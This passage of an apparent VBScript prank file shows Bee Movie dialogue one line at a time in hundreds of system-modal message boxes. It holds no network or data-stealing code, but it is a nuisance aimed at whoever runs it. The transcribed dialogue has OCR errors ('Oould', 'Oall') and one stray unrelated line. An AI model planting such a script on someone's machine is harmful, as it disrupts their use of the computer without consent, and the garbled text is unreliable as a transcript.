motion-picture-capture",4096,"Bee") x=MsgBox("Hollywood wizardry?",4096,"Bee") x=MsgBox("They could be using laser beams!",4096,"Bee") x=MsgBox("Robotics! Ventriloquism!",4096,"Bee") x=MsgBox("Oloning! For all we know,",4096,"Bee") x=MsgBox("he could be on steroids!",4096,"Bee") x=MsgBox("Mr. Benson?",4096,"Bee") x=MsgBox("Ladies and gentlemen,",4096,"Bee") x=MsgBox("there's no trickery here.",4096,"Bee") x=MsgBox("I'm just an ordinary bee.",4096,"Bee") x=MsgBox("Honey's pretty important to me.",4096,"Bee") x=MsgBox("It's important to all bees.",4096,"Bee") x=MsgBox("We invented it!",4096,"Bee") x=MsgBox("We make it. And we protect it",4096,"Bee") x=MsgBox("with our lives.",4096,"Bee") x=MsgBox("Unfortunately, there are",4096,"Bee") x=MsgBox("some people in this room",4096,"Bee") x=MsgBox("who think they can take it from us",4096,"Bee") x=MsgBox("'cause we're the little guys!",4096,"Bee") x=MsgBox("I'm hoping that, after this is all over,",4096,"Bee") x=MsgBox("you'll see how, by taking our honey,",4096,"Bee") x=MsgBox("you not only take everything we have",4096,"Bee") x=MsgBox("but everything we are!",4096,"Bee") x=MsgBox("I wish he'd dress like that",4096,"Bee") x=MsgBox("all the time. So nice!",4096,"Bee") x=MsgBox("Oall your first witness.",4096,"Bee") x=MsgBox("So, Mr. Klauss Vanderhayden",4096,"Bee") x=MsgBox("of Honey Farms, big company you have.",4096,"Bee") x=MsgBox("I suppose so.",4096,"Bee") x=MsgBox("I see you also own",4096,"Bee") x=MsgBox("Honeyburton and Honron!",4096,"Bee") x=MsgBox("Yes, they provide beekeepers",4096,"Bee") x=MsgBox("for our farms.",4096,"Bee") x=MsgBox("Beekeeper. I find that",4096,"Bee") x=MsgBox("to be a very disturbing term.",4096,"Bee") x=MsgBox("I don't imagine you employ",4096,"Bee") x=MsgBox("any bee-free-ers, do you?",4096,"Bee") x=MsgBox("- No.",4096,"Bee") x=MsgBox("- I couldn't hear you.",4096,"Bee") x=MsgBox("- No.",4096,"Bee") x=MsgBox("- No.",4096,"Bee") x=MsgBox("Because you don't free bees.",4096,"Bee") x=MsgBox("You keep bees. Not only that,",4096,"Bee") x=MsgBox("it seems you thought a bear would be",4096,"Bee") x=MsgBox("an appropriate image for a jar of honey.",4096,"Bee") x=MsgBox("They're very lovable creatures.",4096,"Bee") x=MsgBox("Yogi Bear, Fozzie Bear, Build-A-Bear.",4096,"Bee") x=MsgBox("You mean like this?",4096,"Bee") x=MsgBox("Bears kill bees!",4096,"Bee") x=MsgBox("How'd you like his head crashing",4096,"Bee") x=MsgBox("through your living room?!",4096,"Bee") x=MsgBox("Biting into your couch!",4096,"Bee") x=MsgBox("Spitting out your throw pillows!",4096,"Bee") x=MsgBox("OK, that's enough. Take him away.",4096,"Bee") x=MsgBox("So, Mr. Sting, thank you for being here.",4096,"Bee") x=MsgBox("Your name intrigues me.",4096,"Bee") x=MsgBox("- Where have I heard it before?",4096,"Bee") x=MsgBox("- I was with a band called The Police.",4096,"Bee") x=MsgBox("But you've never been",4096,"Bee") x=MsgBox("a police officer, have you?",4096,"Bee") x=MsgBox("No, I haven't.",4096,"Bee") x=MsgBox("No, you haven't. And so here",4096,"Bee") x=MsgBox("we have yet another example",4096,"Bee") x=MsgBox("of bee culture casually",4096,"Bee") x=MsgBox("stolen by a human",4096,"Bee") x=MsgBox("for nothing more than",4096,"Bee") x=MsgBox("a prance-about stage name.",4096,"Bee") x=MsgBox("Oh, please.",4096,"Bee") x=MsgBox("Have you ever been stung, Mr. Sting?",4096,"Bee") x=MsgBox("Because I'm feeling",4096,"Bee") x=MsgBox("a little stung, Sting.",4096,"Bee") x=MsgBox("Or should I say... Mr. Gordon M. Sumner!",4096,"Bee") x=MsgBox("That's not his real name?! You idiots!",4096,"Bee") x=MsgBox("Mr. Liotta, first,",4096,"Bee") x=MsgBox("belated congratulations on",4096,"Bee") x=MsgBox("your Emmy win for a guest spot",4096,"Bee") x=MsgBox("on ER in 2005.",4096,"Bee") x=MsgBox("Thank you. Thank you.",4096,"Bee") x=MsgBox("I see from your resume",4096,"Bee") x=MsgBox("that you're devilishly handsome",4096,"Bee") x=MsgBox("with a churning inner turmoil",4096,"Bee") x=MsgBox("that's ready to blow.",4096,"Bee") x=MsgBox("I enjoy what I do. Is that a crime?",4096,"Bee") x=MsgBox("Not yet it isn't. But is this",4096,"Bee") x=MsgBox("what it's come to for you?",4096,"Bee") x=MsgBox("Exploiting tiny, helpless bees",4096,"Bee") x=MsgBox("so you don't",4096,"Bee") x=MsgBox("have to rehearse",4096,"Bee") x=MsgBox("your part and learn your lines, sir?",4096,"Bee") x=MsgBox("Watch it, Benson!",4096,"Bee") x=MsgBox("I could blow right now!",4096,"Bee") x=MsgBox("This isn't a goodfella.",4096,"Bee") x=MsgBox("This is a badfella!",4096,"Bee") x=MsgBox("Why doesn't someone just step on",4096,"Bee") x=MsgBox("this creep, and we can all go home?!",4096,"Bee") x=MsgBox("- Order in this court!",4096,"Bee") x=MsgBox("- You're all thinking it!",4096,"Bee") x=MsgBox("Order! Order, I say!",4096,"Bee") x=MsgBox("- Say it!",4096,"Bee") x=MsgBox("- Mr. Liotta, please sit down!",4096,"Bee") x=MsgBox("I think it was awfully nice",4096,"Bee") x=MsgBox("of that bear to pitch in like that.",4096,"Bee") x=MsgBox("I think the jury's on our side.",4096,"Bee") x=MsgBox("Are we doing everything right, legally?",4096,"Bee") x=MsgBox("I'm a florist.",4096,"Bee") x=MsgBox("Right. Well, here's to a great team.",4096,"Bee") x=MsgBox("To a great team!",4096,"Bee") x=MsgBox("Well, hello.",4096,"Bee") x=MsgBox("- Ken!",4096,"Bee") x=MsgBox("- Hello.",4096,"Bee") x=MsgBox("I didn't think you were coming.",4096,"Bee") x=MsgBox("No, I was just late.",4096,"Bee") x=MsgBox("I tried to call, but... the battery.",4096,"Bee") x=MsgBox("I didn't want all this to go to waste,",4096,"Bee") x=MsgBox("so I called Barry. Luckily, he was free.",4096,"Bee") x=MsgBox("Oh, that was lucky.",4096,"Bee") x=MsgBox("There's a little left.",4096,"Bee") x=MsgBox("I could heat it up.",4096,"Bee") x=MsgBox("Yeah, heat it up, sure, whatever.",4096,"Bee") x=MsgBox("So I hear you're quite a tennis player.",4096,"Bee") x=MsgBox("I'm not much for the game myself.",4096,"Bee") x=MsgBox("The ball's a little grabby.",4096,"Bee") x=MsgBox("That's where I usually sit.",4096,"Bee") x=MsgBox("Right... there.",4096,"Bee") x=MsgBox("Ken, Barry was looking at your resume,",4096,"Bee") x=MsgBox("and he agreed with me that eating with",4096,"Bee") x=MsgBox("chopsticks isn't really a special skill.",4096,"Bee") x=MsgBox("You think I don't see what you're doing?",4096,"Bee") x=MsgBox("I know how hard it is to find",4096,"Bee") x=MsgBox("the rightjob. We have that in common.",4096,"Bee") x=MsgBox("Do we?",4096,"Bee") x=MsgBox("Bees have 100 percent employment,",4096,"Bee") x=MsgBox("but we do jobs like taking the crud out.",4096,"Bee") x=MsgBox("That's just what",4096,"Bee") x=MsgBox("I was thinking about doing.",4096,"Bee") x=MsgBox("Ken, I let Barry borrow your razor",4096,"Bee") x=MsgBox("for his fuzz. I hope that was all right.",4096,"Bee") x=MsgBox("I'm going to drain the old stinger.",4096,"Bee") x=MsgBox("Yeah, you do that.",4096,"Bee") x=MsgBox("Look at that.",4096,"Bee") x=MsgBox("You know, I've just about had it",4096,"Bee") x=MsgBox("with your little mind games.",4096,"Bee") x=MsgBox("- What's that?",4096,"Bee") x=MsgBox("- Italian Vogue.",4096,"Bee") x=MsgBox("Mamma mia, that's a lot of pages.",4096,"Bee") x=MsgBox("A lot of ads.",4096,"Bee") x=MsgBox("Remember what Van said, why is",4096,"Bee") x=MsgBox("your life more valuable than mine?",4096,"Bee") x=MsgBox("Funny, I just can't seem to recall that!",4096,"Bee") x=MsgBox("I think something stinks in here!",4096,"Bee") x=MsgBox("I love the smell of flowers.",4096,"Bee") x=MsgBox("How do you like the smell of flames?!",4096,"Bee") x=MsgBox("Not as much.",4096,"Bee") x=MsgBox("Water bug! Not taking sides!",4096,"Bee") x=MsgBox("Ken, I'm wearing a Ohapstick hat!",4096,"Bee") x=MsgBox("This is pathetic!",4096,"Bee") x=MsgBox("I've got issues!",4096,"Bee") x=MsgBox("Well, well, well, a royal flush!",4096,"Bee") x=MsgBox("- You're bluffing.",4096,"Bee") x=MsgBox("- Am I?",4096,"Bee") x=MsgBox("Surf's up, dude!",4096,"Bee") x=MsgBox("Poo water!",4096,"Bee") x=MsgBox("That bowl is gnarly.",4096,"Bee") x=MsgBox("Except for those dirty yellow rings!",4096,"Bee") x=MsgBox("Kenneth! What are you doing?!",4096,"Bee") x=MsgBox("You know, I don't even like honey!",4096,"Bee") x=MsgBox("I don't eat it!",4096,"Bee") x=MsgBox("We need to talk!",4096,"Bee") x=MsgBox("He's just a little bee!",4096,"Bee") x=MsgBox("And he happens to be",4096,"Bee") x=MsgBox("the nicest bee I've met in a long time!",4096,"Bee") x=MsgBox("Long time? What are you talking about?!",4096,"Bee") x=MsgBox("Are there other bugs in your life?",4096,"Bee") x=MsgBox("No, but there are other things bugging",4096,"Bee") x=MsgBox("me in life. And you're one of them!",4096,"Bee") x=MsgBox("Fine! Talking bees, no yogurt night...",4096,"Bee") x=MsgBox("My nerves are fried from riding",4096,"Bee") x=MsgBox("on this emotional roller coaster!",4096,"Bee") x=MsgBox("Goodbye, Ken.",4096,"Bee") x=MsgBox("And for your information,",4096,"Bee") x=MsgBox("I prefer sugar-free, artificial",4096,"Bee") x=MsgBox("sweeteners made by man!",4096,"Bee") x=MsgBox("I'm sorry about all that.",4096,"Bee") x=MsgBox("I know it's got",4096,"Bee") x=MsgBox("an aftertaste! I like it!",4096,"Bee") x=MsgBox("I always felt there was some kind",4096,"Bee") x=MsgBox("of barrier between Ken and me.",4096,"Bee") x=MsgBox("I couldn't overcome it.",4096,"Bee") x=MsgBox("Oh, well.",4096,"Bee") x=MsgBox("Are you OK for the trial?",4096,"Bee") x=MsgBox("I believe Mr. Montgomery",4096,"Bee") x=MsgBox("is about out of ideas.",4096,"Bee") x=MsgBox("We would like to call",4096,"Bee") x=MsgBox("Mr. Barry Benson Bee to the stand.",4096,"Bee") x=MsgBox("Good idea! You can really see why he's",4096,"Bee") x=MsgBox("considered one of the best lawyers...",4096,"Bee") x=MsgBox("Yeah.",4096,"Bee") x=MsgBox("Layton, you've",4096,"Bee") x=MsgBox("gotta weave some magic",4096,"Bee") x=MsgBox("with this jury,",4096,"Bee") x=MsgBox("or it's gonna be all over.",4096,"Bee") x=MsgBox("Don't worry. The only thing I have",4096,"Bee") x=MsgBox("to do to turn this jury around",4096,"Bee") x=MsgBox("is to remind them",4096,"Bee") x=MsgBox("of what they don't like about bees.",4096,"Bee") x=MsgBox("- You got the tweezers?",4096,"Bee") x=MsgBox("- Are you allergic?",4096,"Bee") x=MsgBox("Only to losing, son. Only to losing.",4096,"Bee") x=MsgBox("Mr. Benson Bee, I'll ask you",4096,"Bee") x=MsgBox("what I think we'd all like to know.",4096,"Bee") x=MsgBox("What exactly is your relationship",4096,"Bee") x=MsgBox("to that woman?",4096,"Bee") x=MsgBox("We're friends.",4096,"Bee") x=MsgBox("- Good friends?",4096,"Bee") x=MsgBox("- Yes.",4096,"Bee") x=MsgBox("How good? Do you live together?",4096,"Bee") x=MsgBox("Wait a minute...",4096,"Bee") x=MsgBox("Are you her little...",4096,"Bee") x=MsgBox("...bedbug?",4096,"Bee") x=MsgBox("I've seen a bee documentary or two.",4096,"Bee") x=MsgBox("From what I understand,",4096,"Bee") x=MsgBox("doesn't your queen give birth",4096,"Bee") x=MsgBox("to all the bee children?",4096,"Bee") x=MsgBox("- Yeah, but...",4096,"Bee") x=MsgBox("- So those aren't your real parents!",4096,"Bee") x=MsgBox("- Oh, Barry...",4096,"Bee") x=MsgBox("- Yes, they are!",4096,"Bee") x=MsgBox("Hold me back!",4096,"Bee") x=MsgBox("You're an illegitimate bee,",4096,"Bee") x=MsgBox("aren't you, Benson?",4096,"Bee") x=MsgBox("He's denouncing bees!",4096,"Bee") x=MsgBox("Don't y'all date your cousins?",4096,"Bee") x=MsgBox("- Objection!",4096,"Bee") x=MsgBox("- I'm going to pincushion this guy!",4096,"Bee") x=MsgBox("Adam, don't! It's what he wants!",4096,"Bee") x=MsgBox("Oh, I'm hit!!",4096,"Bee") x=MsgBox("Oh, lordy, I am hit!",4096,"Bee") x=MsgBox("Order! Order!",4096,"Bee") x=MsgBox("The venom! The venom",4096,"Bee") x=MsgBox("is coursing through my veins!",4096,"Bee") x=MsgBox("I have been felled",4096,"Bee") x=MsgBox("by a winged beast of destruction!",4096,"Bee") x=MsgBox("You see? You can't treat them",4096,"Bee") x=MsgBox("like equals! They're striped savages!",4096,"Bee") x=MsgBox("Stinging's the only thing",4096,"Bee") x=MsgBox("they know! It's their way!",4096,"Bee") x=MsgBox("- Adam, stay with me.",4096,"Bee") x=MsgBox("- I can't feel my legs.",4096,"Bee") x=MsgBox("What angel of mercy",4096,"Bee") x=MsgBox("will come forward to suck the poison",4096,"Bee") x=MsgBox("from my heaving buttocks?",4096,"Bee") x=MsgBox("I will have order in this court. Order!",4096,"Bee") x=MsgBox("Order, please!",4096,"Bee") x=MsgBox("The case of the honeybees",4096,"Bee") x=MsgBox("versus the human race",4096,"Bee") x=MsgBox("took a pointed turn against the bees",4096,"Bee") x=MsgBox("yesterday when one of their legal",4096,"Bee") x=MsgBox("team stung Layton T. Montgomery.",4096,"Bee") x=MsgBox("- Hey, buddy.",4096,"Bee") x=MsgBox("- Hey.",4096,"Bee") x=MsgBox("- Is there much pain?",4096,"Bee") x=MsgBox("- Yeah.",4096,"Bee") x=MsgBox("I...",4096,"Bee") x=MsgBox("I blew the whole case, didn't I?",4096,"Bee") x=MsgBox("It doesn't matter. What matters is",4096,"Bee") x=MsgBox("you're alive. You could have died.",4096,"Bee") x=MsgBox("I'd be better off dead. Look at me.",4096,"Bee") x=MsgBox("They got it from the cafeteria",4096,"Bee") x=MsgBox("downstairs, in a tuna sandwich.",4096,"Bee") x=MsgBox("Look, there's",4096,"Bee") x=MsgBox("a little celery still on it.",4096,"Bee") x=MsgBox("What was it like to sting someone?",4096,"Bee") x=MsgBox("I can't explain it. It was all...",4096,"Bee") x=MsgBox("All adrenaline and then...",4096,"Bee") x=MsgBox("and then ecstasy!",4096,"Bee") x=MsgBox("All right.",4096,"Bee") x=MsgBox("You think it was all a trap?",4096,"Bee") x=MsgBox("Of course. I'm sorry.",4096,"Bee") x=MsgBox("I flew us right into this.",4096,"Bee") x=MsgBox("What were we thinking? Look at us. We're",4096,"Bee") x=MsgBox("just a couple of bugs in this world.",4096,"Bee") x=MsgBox("What will the humans do to us",4096,"Bee") x=MsgBox("if they win?",4096,"Bee") x=MsgBox("I don't know.",4096,"Bee") x=MsgBox("I hear they put the roaches in motels.",4096,"Bee") x=MsgBox("That doesn't sound so bad.",4096,"Bee") x=MsgBox("Adam, they check in,",4096,"Bee") x=MsgBox("but they don't check out!",4096,"Bee") x=MsgBox("Oh, my.",4096,"Bee") x=MsgBox("Oould you get a nurse",4096,"Bee") x=MsgBox("to close that window?",4096,"Bee") x=MsgBox("- Why?",4096,"Bee") x=MsgBox("- The smoke.",4096,"Bee") x=MsgBox("Bees don't smoke.",4096,"Bee") x=MsgBox("Right. Bees don't smoke.",4096,"Bee") x=MsgBox("Bees don't smoke!",4096,"Bee") x=MsgBox("But some bees are smoking.",4096,"Bee") x=MsgBox("That's it! That's our case!",4096,"Bee") x=MsgBox("It is? It's not over?",4096,"Bee") x=MsgBox("Get dressed. I've gotta go somewhere.",4096,"Bee") x=MsgBox("Get back to the court and stall.",4096,"Bee") x=MsgBox("Stall any way you can.",4096,"Bee") x=MsgBox("And assuming you've done step correctly, you're ready for the tub.",4096,"Bee") x=MsgBox("Mr. Flayman.",4096,"Bee") x=MsgBox("Yes? Yes, Your Honor!",4096,"Bee") x=MsgBox("Where is the rest of your team?",4096,"Bee") x=MsgBox("Well, Your Honor, it's interesting.",4096,"Bee") x=MsgBox("Bees are trained to fly haphazardly,",4096,"Bee") x=MsgBox("and as a result,",4096,"Bee") x=MsgBox("we don't make very good time.",4096,"Bee") x=MsgBox("I actually heard a funny story about...",4096,"Bee") x=MsgBox("Your Honor,",4096,"Bee") x=MsgBox("haven't these ridiculous bugs",4096,"Bee") x=MsgBox("taken up enough",4096,"Bee") x=MsgBox("of this court's valuable time?",4096,"Bee") x=MsgBox("How much longer will we allow",4096,"Bee") x=MsgBox("these absurd shenanigans to go on?",4096,"Bee") x=MsgBox("They have presented no compelling",4096,"Bee") x=MsgBox("evidence to support their charges",4096,"Bee") x=MsgBox("against my clients,",4096,"Bee") x=MsgBox("who run legitimate businesses.",4096,"Bee") x=MsgBox("I move for a complete dismissal",4096,"Bee") x=MsgBox("of this entire case!",4096,"Bee") x=MsgBox("Mr. Flayman, I'm afraid I'm going",4096,"Bee") x=MsgBox("to have to consider",4096,"Bee") x=MsgBox("Mr. Montgomery's motion.",4096,"Bee") x=MsgBox("But you can't! We have a terrific case.",4096,"Bee") x=MsgBox("Where is your proof?",4096,"Bee") x=MsgBox("Where is the evidence?",4096,"Bee") x=MsgBox("Show me the smoking gun!",4096,"Bee") x=MsgBox("Hold it, Your Honor!",4096,"Bee") x=MsgBox("You want a smoking gun?",4096,"Bee") x=MsgBox("Here is your smoking gun.",4096,"Bee") x=MsgBox("What is that?",4096,"Bee") x=MsgBox("It's a bee smoker!",4096,"Bee") x=MsgBox("What, this?",4096,"Bee") x=MsgBox("This harmless little contraption?",4096,"Bee") x=MsgBox("This couldn't hurt a fly,",4096,"Bee") x=MsgBox("let alone a bee.",4096,"Bee") x=MsgBox("Look at what has happened",4096,"Bee") x=MsgBox("to bees who have never been asked,",4096,"Bee") x=MsgBox("" & Chr(34) & "Smoking or non?" & Chr(34) & "",4096,"Bee") x=MsgBox("Is this what nature intended for us?",4096,"Bee") x=MsgBox("To be forcibly addicted",4096,"Bee") x=MsgBox("to smoke machines",4096,"Bee") x=MsgBox("and man-made wooden slat work camps?",4096,"Bee") x=MsgBox("Living out our lives as honey slaves",4096,"Bee") x=MsgBox("to the white man?",4096,"Bee") x=MsgBox("- What are we gonna do?",4096,"Bee") x=MsgBox("- He's playing the species card.",4096,"Bee") x=MsgBox("Ladies and gentlemen, please,",4096,"Bee") x=MsgBox("free these bees!",4096,"Bee") x=MsgBox("Free the bees! Free the bees!",4096,"Bee") x=MsgBox("Free the bees!",4096,"Bee") x=MsgBox("Free the bees! Free the bees!",4096,"Bee") x=MsgBox("The court finds in favor of the bees!",4096,"Bee") x=MsgBox("Vanessa, we won!",4096,"Bee") x=MsgBox("I knew you could do it! High-five!",4096,"Bee") x=MsgBox("Sorry.",4096,"Bee") x=MsgBox("I'm OK! You know what this means?",4096,"Bee") x=MsgBox("All the honey",4096,"Bee") x=MsgBox("will finally belong to the bees.",4096,"Bee") x=MsgBox("Now we won't have",4096,"Bee") x=MsgBox("to work so hard all the time.",4096,"Bee") x=MsgBox("This is an unholy perversion",4096,"Bee") x=MsgBox("of the balance of nature, Benson.",4096,"Bee") x=MsgBox("You'll regret this.",4096,"Bee") x=MsgBox("Barry, how much honey is out there?",4096,"Bee") x=MsgBox("All right. One at a time.",4096,"Bee") x=MsgBox("Barry, who are you wearing?",4096,"Bee") x=MsgBox("My sweater is Ralph Lauren,",4096,"Bee") x=MsgBox("and I have no pants.",4096,"Bee") x=MsgBox("- What if Montgomery's right?",4096,"Bee") x=MsgBox("- What do you mean?",4096,"Bee") x=MsgBox("We've been living the bee way",4096,"Bee") x=MsgBox("a long time, 27 million years.",4096,"Bee") x=MsgBox("Oongratulations on your victory.",4096,"Bee") x=MsgBox("What will you demand as a settlement?",4096,"Bee") x=MsgBox("First, we'll demand a complete shutdown",4096,"Bee") x=MsgBox("of all bee work camps.",4096,"Bee") x=MsgBox("Then we want back the honey",4096,"Bee") x=MsgBox("that was ours to begin with,",4096,"Bee") x=MsgBox("every last drop.",4096,"Bee") x=MsgBox("We demand an end to the glorification",4096,"Bee") x=MsgBox("of the bear as anything more",4096,"Bee") x=MsgBox("than a filthy, smelly,",4096,"Bee") x=MsgBox("bad-breath stink machine.",4096,"Bee") x=MsgBox("We're all aware",4096,"Bee") x=MsgBox("of what they do in the woods.",4096,"Bee") x=MsgBox("Wait for my signal.",4096,"Bee") x=MsgBox("Take him out.",4096,"Bee") x=MsgBox("He'll have nauseous",4096,"Bee") x=MsgBox("for a few hours, then he'll be fine.",4096,"Bee") x=MsgBox("And we will no longer tolerate",4096,"Bee") x=MsgBox("bee-negative nicknames...",4096,"Bee") x=MsgBox("But it's just a prance-about stage name!",4096,"Bee") x=MsgBox("...unnecessary inclusion of honey",4096,"Bee") x=MsgBox("in bogus health products",4096,"Bee") x=MsgBox("and la-dee-da human",4096,"Bee") x=MsgBox("tea-time snack garnishments.",4096,"Bee") x=MsgBox("Oan't breathe.",4096,"Bee") x=MsgBox("Bring it in, boys!",4096,"Bee") x=MsgBox("Hold it right there! Good.",4096,"Bee") x=MsgBox("Tap it.",4096,"Bee") x=MsgBox("Mr. Buzzwell, we just passed three cups,",4096,"Bee") x=MsgBox("and there's gallons more coming!",4096,"Bee") x=MsgBox("- I think we need to shut down!",4096,"Bee") x=MsgBox("- Shut down? We've never shut down.",4096,"Bee") x=MsgBox("Shut down honey production!",4096,"Bee") x=MsgBox("Stop making honey!",4096,"Bee") x=MsgBox("Turn your key, sir!",4096,"Bee") x=MsgBox("What do we do now?",4096,"Bee") x=MsgBox("Oannonball!",4096,"Bee") x=MsgBox("We're shutting honey production!",4096,"Bee") x=MsgBox("Mission abort.",4096,"Bee") x=MsgBox("Aborting pollination and nectar detail.",4096,"Bee") x=MsgBox("Returning to base.",4096,"Bee") x=MsgBox("Adam, you wouldn't believe",4096,"Bee") x=MsgBox("how much honey was out there.",4096,"Bee") x=MsgBox("Oh, yeah?",4096,"Bee") x=MsgBox("What's going on? Where is everybody?",4096,"Bee") x=MsgBox("- Are they out celebrating?",4096,"Bee") x=MsgBox("- They're home.",4096,"Bee") x=MsgBox("They don't know what to do.",4096,"Bee") x=MsgBox("Laying out, sleeping in.",4096,"Bee") x=MsgBox("I heard your Uncle Oarl was on his way",4096,"Bee") x=MsgBox("to San Antonio with a cricket.",4096,"Bee") x=MsgBox("At least we got our honey back.",4096,"Bee") x=MsgBox("Sometimes I think, so what if humans",4096,"Bee") x=MsgBox("liked our honey? Who wouldn't?",4096,"Bee") x=MsgBox("It's the greatest thing in the world!",4096,"Bee") x=MsgBox("I was excited to be part of making it.",4096,"Bee") x=MsgBox("This was my new desk. This was my",4096,"Bee") x=MsgBox("new job. I wanted to do it really well.",4096,"Bee") x=MsgBox("And now...",4096,"Bee") x=MsgBox("Now I can't.",4096,"Bee") x=MsgBox("I don't understand",4096,"Bee") x=MsgBox("why they're not happy.",4096,"Bee") x=MsgBox("I thought their lives would be better!",4096,"Bee") x=MsgBox("They're doing nothing. It's amazing.",4096,"Bee") x=MsgBox("Honey really changes people.",4096,"Bee") x=MsgBox("You don't have any idea",4096,"Bee") x=MsgBox("what's going on, do you?",4096,"Bee") x=MsgBox("- What did you want to show me?",4096,"Bee") x=MsgBox("- This.",4096,"Bee") x=MsgBox("What happened here?",4096,"Bee") x=MsgBox("That is not the half of it.",4096,"Bee") x=MsgBox("Oh, no. Oh, my.",4096,"Bee") x=MsgBox("They're all wilting.",4096,"Bee") x=MsgBox("Doesn't look very good, does it?",4096,"Bee") x=MsgBox("No.",4096,"Bee") x=MsgBox("And whose fault do you think that is?",4096,"Bee") x=MsgBox("You know, I'm gonna guess bees.",4096,"Bee") x=MsgBox("Bees?",4096,"Bee") x=MsgBox("Specifically, me.",4096,"Bee") x=MsgBox("I didn't think bees not needing to make",4096,"Bee") x=MsgBox("honey would affect all these things.",4096,"Bee") x=MsgBox("It's notjust flowers.",4096,"Bee") x=MsgBox("Fruits, vegetables, they all need bees.",4096,"Bee") x=MsgBox("That's our whole SAT test right there.",4096,"Bee") x=MsgBox("Take away produce, that affects",4096,"Bee") x=MsgBox("the entire animal kingdom.",4096,"Bee") x=MsgBox("And then, of course...",4096,"Bee") x=MsgBox("The human species?",4096,"Bee") x=MsgBox("So if there's no more pollination,",4096,"Bee") x=MsgBox("it could all just go south here,",4096,"Bee") x=MsgBox("couldn't it?",4096,"Bee") x=MsgBox("I know this is also partly my fault.",4096,"Bee") x=MsgBox("How about a suicide pact?",4096,"Bee") x=MsgBox("How do we do it?",4096,"Bee") x=MsgBox("- I'll sting you, you step on me.",4096,"Bee") x=MsgBox("- Thatjust kills you twice.",4096,"Bee") x=MsgBox("Right, right.",4096,"Bee") x=MsgBox("Listen, Barry...",4096,"Bee") x=MsgBox("sorry, but I gotta get going.",4096,"Bee") x=MsgBox("I had to open my mouth and talk.",4096,"Bee") x=MsgBox("Vanessa?",4096,"Bee") x=MsgBox("Vanessa? Why are you leaving?",4096,"Bee") x=MsgBox("Where are you going?",4096,"Bee") x=MsgBox("To the final Tournament of Roses parade",4096,"Bee") x=MsgBox("in Pasadena.",4096,"Bee") x=MsgBox("They've moved it to this weekend",4096,"Bee") x=MsgBox("because all the flowers are dying.",4096,"Bee") x=MsgBox("It's the last chance",4096,"Bee") x=MsgBox("I'll ever have to see it.",4096,"Bee") x=MsgBox("Vanessa, I just wanna say I'm sorry.",4096,"Bee") x=MsgBox("I never meant it to turn out like this.",4096,"Bee") x=MsgBox("I know. Me neither.",4096,"Bee") x=MsgBox("Tournament of Roses.",4096,"Bee") x=MsgBox("Roses can't do sports.",4096,"Bee") x=MsgBox("Wait a minute. Roses. Roses?",4096,"Bee") x=MsgBox("Roses!",4096,"Bee") x=MsgBox("Vanessa!",4096,"Bee") x=MsgBox("Roses?!",4096,"Bee") x=MsgBox("Barry?",4096,"Bee") x=MsgBox("- Roses are flowers!",4096,"Bee") x=MsgBox("- Yes, they are.",4096,"Bee") x=MsgBox("Flowers, bees, pollen!",4096,"Bee") x=MsgBox("I know.",4096,"Bee") x=MsgBox("That's why this is the last parade.",4096,"Bee") x=MsgBox("Maybe not.",4096,"Bee") x=MsgBox("Oould you ask him to slow down?",4096,"Bee") x=MsgBox("Oould you slow down?",4096,"Bee") x=MsgBox("Barry!",4096,"Bee") x=MsgBox("OK, I made a huge mistake.",4096,"Bee") x=MsgBox("This is a total disaster, all my fault.",4096,"Bee") x=MsgBox("Yes, it kind of is.",4096,"Bee") x=MsgBox("I've ruined the planet.",4096,"Bee") x=MsgBox("I wanted to help you",4096,"Bee") x=MsgBox("with the flower shop.",4096,"Bee") x=MsgBox("I've made it worse.",4096,"Bee") x=MsgBox("Actually, it's completely closed down.",4096,"Bee") x=MsgBox("I thought maybe you were remodeling.",4096,"Bee") x=MsgBox("But I have another idea, and it's",4096,"Bee") x=MsgBox("greater than my previous ideas combined.",4096,"Bee") x=MsgBox("I don't want to hear it!",4096,"Bee") x=MsgBox("All right, they have the roses,",4096,"Bee") x=MsgBox("the roses have the pollen.",4096,"Bee") x=MsgBox("I know every bee, plant",4096,"Bee") x=MsgBox("and flower bud in this park.",4096,"Bee") x=MsgBox("All we gotta do is get what they've got",4096,"Bee") x=MsgBox("back here with what we've got.",4096,"Bee") x=MsgBox("- Bees.",4096,"Bee") x=MsgBox("- Park.",4096,"Bee") x=MsgBox("- Pollen!",4096,"Bee") x=MsgBox("- Flowers.",4096,"Bee") x=MsgBox("- Repollination!",4096,"Bee") x=MsgBox("- Across the nation!",4096,"Bee") x=MsgBox("Tournament of Roses,",4096,"Bee") x=MsgBox("Pasadena, Oalifornia.",4096,"Bee") x=MsgBox("They've got nothing",4096,"Bee") x=MsgBox("but flowers, floats and cotton candy.",4096,"Bee") x=MsgBox("Security will be tight.",4096,"Bee") x=MsgBox("I have an idea.",4096,"Bee") x=MsgBox("Vanessa Bloome, FTD.",4096,"Bee") x=MsgBox("Official floral business. It's real.",4096,"Bee") x=MsgBox("Sorry, ma'am. Nice brooch.",4096,"Bee") x=MsgBox("Thank you. It was a gift.",4096,"Bee") x=MsgBox("Once inside,",4096,"Bee") x=MsgBox("we just pick the right float.",4096,"Bee") x=MsgBox("How about The Princess and the Pea?",4096,"Bee") x=MsgBox("I could be the princess,",4096,"Bee") x=MsgBox("and you could be the pea!",4096,"Bee") x=MsgBox("Yes, I got it.",4096,"Bee") x=MsgBox("- Where should I sit?",4096,"Bee") x=MsgBox("- What are you?",4096,"Bee") x=MsgBox("- I believe I'm the pea.",4096,"Bee") x=MsgBox("- The pea?",4096,"Bee") x=MsgBox("It goes under the mattresses.",4096,"Bee") x=MsgBox("- Not in this fairy tale, sweetheart.",4096,"Bee") x=MsgBox("- I'm getting the marshal.",4096,"Bee") x=MsgBox("You do that!",4096,"Bee") x=MsgBox("This whole parade is a fiasco!",4096,"Bee") x=MsgBox("Let's see what this baby'll do.",4096,"Bee") x=MsgBox("Hey, what are you doing?!",4096,"Bee") x=MsgBox("Then all we do",4096,"Bee") x=MsgBox("is blend in with traffic...",4096,"Bee") x=MsgBox("...without arousing suspicion.",4096,"Bee") x=MsgBox("Once at the airport,",4096,"Bee") x=MsgBox("there's no stopping us.",4096,"Bee") x=MsgBox("Stop! Security.",4096,"Bee") x=MsgBox("- You and your insect pack your float?",4096,"Bee") x=MsgBox("- Yes.",4096,"Bee") x=MsgBox("Has it been",4096,"Bee") x=MsgBox("in your possession the entire time?",4096,"Bee") x=MsgBox("Would you remove your shoes?",4096,"Bee") x=MsgBox("- Remove your stinger.",4096,"Bee") x=MsgBox("- It's part of me.",4096,"Bee") x=MsgBox("I know. Just having some fun.",4096,"Bee") x=MsgBox("Enjoy your 